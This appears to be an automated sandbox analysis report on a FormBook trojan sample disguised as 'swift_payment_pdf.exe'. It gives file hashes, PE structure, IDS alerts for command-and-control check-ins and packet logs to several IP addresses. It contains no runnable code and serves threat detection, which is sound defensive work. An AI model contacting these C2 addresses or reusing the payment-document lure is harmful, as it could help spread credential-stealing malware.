                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                C:\Users\user\AppData\Local\Temp\782yF2SJ

                Download File
                Process:C:\Windows\SysWOW64\explorer.exe
                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category:dropped
                Size (bytes):114688
                Entropy (8bit):0.9746603542602881
                Encrypted:false
                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5:780853CDDEAEE8DE70F28A4B255A600B
                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious:false
                Reputation:high, very likely benign file
                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.943294827580094
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Generic Win/DOS Executable (2004/3) 0.01%
                File name:swift_payment_pdf.exe
                File size:730'624 bytes
                MD5:8e32f87b4f51fac392122d3c43b2e54f
                SHA1:ac11a7300dbec0d2b67e549b97d3a1ab4e30c94a
                SHA256:e7c888a111eeb26eec94afc97e0f9b838fda41ab74e083cb5b94f06800890d2d
                SHA512:e44f6575dc27347ffdd64465539ce58159ddbf0778d548973edb22ab18fb5aa735eb2328a6f1f144c59142d06036679da5979e2356105b23f42e260a3e80c655
                SSDEEP:12288:05m/rFrlNf+wr8l1KwycLpArl/8zmT+khGodl+wP9934t/SLEhLpZNdfT:RFBuEwyc1AhEzpmGMl+wP9p4JlNp
                TLSH:86F4230076B88B34D4BE9BB655B146248FB1A63EAD12DBDD1CC940DE8CB3749C501F6B
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............9... ...@....@.. ....................................@................................

                File Icon

                Icon Hash:90cececece8e8eb0

                Static PE Info

                General

                Entrypoint:0x4b39d2
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x6685DA16 [Wed Jul 3 23:09:10 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xb397f0x4f.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x624.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0xb09200x54.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000xb19d80xb1a000c67bbd4cc704538ee850151c0e3b94aFalse0.9527222796446164data7.951002807224344IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0xb40000x6240x80016ea09e970020878a166ba9f624b4212False0.3427734375data3.478355386329158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0xb60000xc0x200e6f15573941ac56212bba43083069c90False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_VERSION0xb40900x394OpenPGP Secret Key0.435589519650655
                RT_MANIFEST0xb44340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/04/24-12:36:18.264786TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26062380192.168.2.43.33.130.190
                07/04/24-12:36:10.661734TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36062080192.168.2.43.33.130.190
                07/04/24-12:35:55.019985TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26061980192.168.2.434.149.87.45
                07/04/24-12:37:07.168398TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26063180192.168.2.4172.80.82.186
                07/04/24-12:36:31.720572TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26062780192.168.2.4116.213.43.190
                07/04/24-12:37:13.031456TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36063280192.168.2.4194.195.220.41
                07/04/24-12:37:25.721255TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36063680192.168.2.4162.0.236.122
                07/04/24-12:37:54.731409TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26064380192.168.2.452.1.217.30
                07/04/24-12:37:28.307762TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36063780192.168.2.4162.0.236.122
                07/04/24-12:36:13.202756TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36062180192.168.2.43.33.130.190
                07/04/24-12:36:26.653593TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36062580192.168.2.4116.213.43.190
                07/04/24-12:37:46.701989TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36064080192.168.2.452.1.217.30
                07/04/24-12:36:24.114076TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36062480192.168.2.4116.213.43.190
                07/04/24-12:37:49.265901TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36064180192.168.2.452.1.217.30
                07/04/24-12:37:20.644937TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26063580192.168.2.4194.195.220.41
                07/04/24-12:37:01.781228TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36062980192.168.2.4172.80.82.186
                07/04/24-12:38:00.723849TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M36064480192.168.2.423.226.70.194

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 4, 2024 12:35:55.004437923 CEST6061980192.168.2.434.149.87.45
                Jul 4, 2024 12:35:55.009546995 CEST806061934.149.87.45192.168.2.4
                Jul 4, 2024 12:35:55.009644985 CEST6061980192.168.2.434.149.87.45
                Jul 4, 2024 12:35:55.019984961 CEST6061980192.168.2.434.149.87.45
                Jul 4, 2024 12:35:55.025290012 CEST806061934.149.87.45192.168.2.4
                Jul 4, 2024 12:35:55.523375034 CEST806061934.149.87.45192.168.2.4
                Jul 4, 2024 12:35:55.523479939 CEST806061934.149.87.45192.168.2.4
                Jul 4, 2024 12:35:55.523603916 CEST6061980192.168.2.434.149.87.45
                Jul 4, 2024 12:35:55.526612997 CEST6061980192.168.2.434.149.87.45
                Jul 4, 2024 12:35:55.532908916 CEST806061934.149.87.45192.168.2.4
                Jul 4, 2024 12:36:10.645859957 CEST6062080192.168.2.43.33.130.190
                Jul 4, 2024 12:36:10.650690079 CEST80606203.33.130.190192.168.2.4
                Jul 4, 2024 12:36:10.652406931 CEST6062080192.168.2.43.33.130.190
                Jul 4, 2024 12:36:10.661734104 CEST6062080192.168.2.43.33.130.190
                Jul 4, 2024 12:36:10.666780949 CEST80606203.33.130.190192.168.2.4
                Jul 4, 2024 12:36:11.128046989 CEST80606203.33.130.190192.168.2.4
                Jul 4, 2024 12:36:11.128205061 CEST6062080192.168.2.43.33.130.190
                Jul 4, 2024 12:36:12.174675941 CEST6062080192.168.2.43.33.130.190
                Jul 4, 2024 12:36:12.182172060 CEST80606203.33.130.190192.168.2.4
                Jul 4, 2024 12:36:13.194328070 CEST6062180192.168.2.43.33.130.190
                Jul 4, 2024 12:36:13.199384928 CEST80606213.33.130.190192.168.2.4
                Jul 4, 2024 12:36:13.199457884 CEST6062180192.168.2.43.33.130.190
                Jul 4, 2024 12:36:13.202755928 CEST6062180192.168.2.43.33.130.190
                Jul 4, 2024 12:36:13.209856987 CEST80606213.33.130.190192.168.2.4
                Jul 4, 2024 12:36:13.223304033 CEST80606213.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.724684000 CEST6062280192.168.2.43.33.130.190
                Jul 4, 2024 12:36:15.730070114 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.730170012 CEST6062280192.168.2.43.33.130.190
                Jul 4, 2024 12:36:15.732542992 CEST6062280192.168.2.43.33.130.190
                Jul 4, 2024 12:36:15.737426996 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737437963 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737447023 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737514973 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737716913 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737726927 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737824917 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737834930 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:15.737843037 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:16.210438967 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:16.210681915 CEST6062280192.168.2.43.33.130.190
                Jul 4, 2024 12:36:17.240235090 CEST6062280192.168.2.43.33.130.190
                Jul 4, 2024 12:36:17.435058117 CEST80606223.33.130.190192.168.2.4
                Jul 4, 2024 12:36:18.255857944 CEST6062380192.168.2.43.33.130.190
                Jul 4, 2024 12:36:18.262588024 CEST80606233.33.130.190192.168.2.4
                Jul 4, 2024 12:36:18.262783051 CEST6062380192.168.2.43.33.130.190
                Jul 4, 2024 12:36:18.264786005 CEST6062380192.168.2.43.33.130.190
                Jul 4, 2024 12:36:18.271512032 CEST80606233.33.130.190192.168.2.4
                Jul 4, 2024 12:36:18.735172033 CEST80606233.33.130.190192.168.2.4
                Jul 4, 2024 12:36:18.735260010 CEST80606233.33.130.190192.168.2.4
                Jul 4, 2024 12:36:18.735368013 CEST6062380192.168.2.43.33.130.190
                Jul 4, 2024 12:36:18.737929106 CEST6062380192.168.2.43.33.130.190
                Jul 4, 2024 12:36:18.742847919 CEST80606233.33.130.190192.168.2.4
                Jul 4, 2024 12:36:24.106890917 CEST6062480192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:24.111884117 CEST8060624116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:24.112005949 CEST6062480192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:24.114075899 CEST6062480192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:24.118932009 CEST8060624116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:25.627938032 CEST6062480192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:25.676723003 CEST8060624116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:26.646445990 CEST6062580192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:26.651350975 CEST8060625116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:26.651424885 CEST6062580192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:26.653593063 CEST6062580192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:26.658426046 CEST8060625116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:26.686113119 CEST8060625116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.177534103 CEST6062680192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:29.182806015 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.182996035 CEST6062680192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:29.185380936 CEST6062680192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:29.190675974 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190685034 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190696955 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190706015 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190713882 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190722942 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190732002 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.190754890 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.191509008 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:29.263684988 CEST8060626116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:31.709135056 CEST6062780192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:31.714059114 CEST8060627116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:31.714220047 CEST6062780192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:31.720571995 CEST6062780192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:31.725435972 CEST8060627116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:45.501624107 CEST8060624116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:45.501727104 CEST6062480192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:53.107381105 CEST8060627116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:53.113460064 CEST6062780192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:53.117228031 CEST6062780192.168.2.4116.213.43.190
                Jul 4, 2024 12:36:53.122370005 CEST8060627116.213.43.190192.168.2.4
                Jul 4, 2024 12:36:59.240912914 CEST6062880192.168.2.4172.80.82.186
                Jul 4, 2024 12:36:59.245747089 CEST8060628172.80.82.186192.168.2.4
                Jul 4, 2024 12:36:59.249306917 CEST6062880192.168.2.4172.80.82.186
                Jul 4, 2024 12:36:59.253226042 CEST6062880192.168.2.4172.80.82.186
                Jul 4, 2024 12:36:59.254465103 CEST8060628172.80.82.186192.168.2.4
                Jul 4, 2024 12:36:59.254698038 CEST6062880192.168.2.4172.80.82.186
                Jul 4, 2024 12:36:59.258116961 CEST8060628172.80.82.186192.168.2.4
                Jul 4, 2024 12:36:59.259465933 CEST8060628172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:01.771233082 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:01.776141882 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:01.776287079 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:01.781228065 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:01.786640882 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.284197092 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.597224951 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.692998886 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.693017006 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.693026066 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.693034887 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.693090916 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.693090916 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.693124056 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.693186998 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.693195105 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.693284988 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.694255114 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.695633888 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.753801107 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.770186901 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:03.795814991 CEST8060629172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:03.826016903 CEST6062980192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:04.302140951 CEST6063080192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:04.626182079 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.649194002 CEST6063080192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:04.649194002 CEST6063080192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:04.688308954 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688312054 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688313007 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688314915 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688316107 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688317060 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688318014 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688318014 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688319921 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:04.688323975 CEST8060630172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.161516905 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.166438103 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.166524887 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.168397903 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.173352957 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.874010086 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.874424934 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.874435902 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:07.874593019 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.874593019 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.879326105 CEST6063180192.168.2.4172.80.82.186
                Jul 4, 2024 12:37:07.884094000 CEST8060631172.80.82.186192.168.2.4
                Jul 4, 2024 12:37:13.024420977 CEST6063280192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:13.029217958 CEST8060632194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:13.029299021 CEST6063280192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:13.031455994 CEST6063280192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:13.036303997 CEST8060632194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:13.551486015 CEST8060632194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:13.551917076 CEST8060632194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:13.552061081 CEST6063280192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:14.569339037 CEST6063280192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:15.552992105 CEST6063380192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:15.558453083 CEST8060633194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:15.558578968 CEST6063380192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:15.560389996 CEST6063380192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:15.563555002 CEST8060633194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:15.563657045 CEST6063380192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:15.565733910 CEST8060633194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:15.568417072 CEST8060633194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.084672928 CEST6063480192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:18.092400074 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.137794971 CEST6063480192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:18.137794971 CEST6063480192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:18.143942118 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.143996000 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144001007 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144006014 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144145966 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144227982 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144239902 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144377947 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.144392967 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:18.152961016 CEST8060634194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:20.630053997 CEST6063580192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:20.638971090 CEST8060635194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:20.644937038 CEST6063580192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:20.644937038 CEST6063580192.168.2.4194.195.220.41
                Jul 4, 2024 12:37:20.650511026 CEST8060635194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:20.660196066 CEST8060635194.195.220.41192.168.2.4
                Jul 4, 2024 12:37:25.713550091 CEST6063680192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:25.718615055 CEST8060636162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:25.718691111 CEST6063680192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:25.721255064 CEST6063680192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:25.726639032 CEST8060636162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:25.822380066 CEST8060636162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.270823956 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:28.305450916 CEST8060637162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.305529118 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:28.307761908 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:28.315538883 CEST8060637162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.941060066 CEST8060637162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.941147089 CEST8060637162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.941199064 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:28.941634893 CEST8060637162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:28.941682100 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:29.815421104 CEST6063780192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:30.834611893 CEST6063880192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:30.839734077 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.839797974 CEST6063880192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:30.842369080 CEST6063880192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:30.848375082 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848428965 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848768950 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848809958 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848818064 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848829985 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848836899 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848845005 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:30.848853111 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:31.488029003 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:31.488044977 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:31.488131046 CEST6063880192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:31.488162041 CEST8060638162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:31.488307953 CEST6063880192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:32.346694946 CEST6063880192.168.2.4162.0.236.122
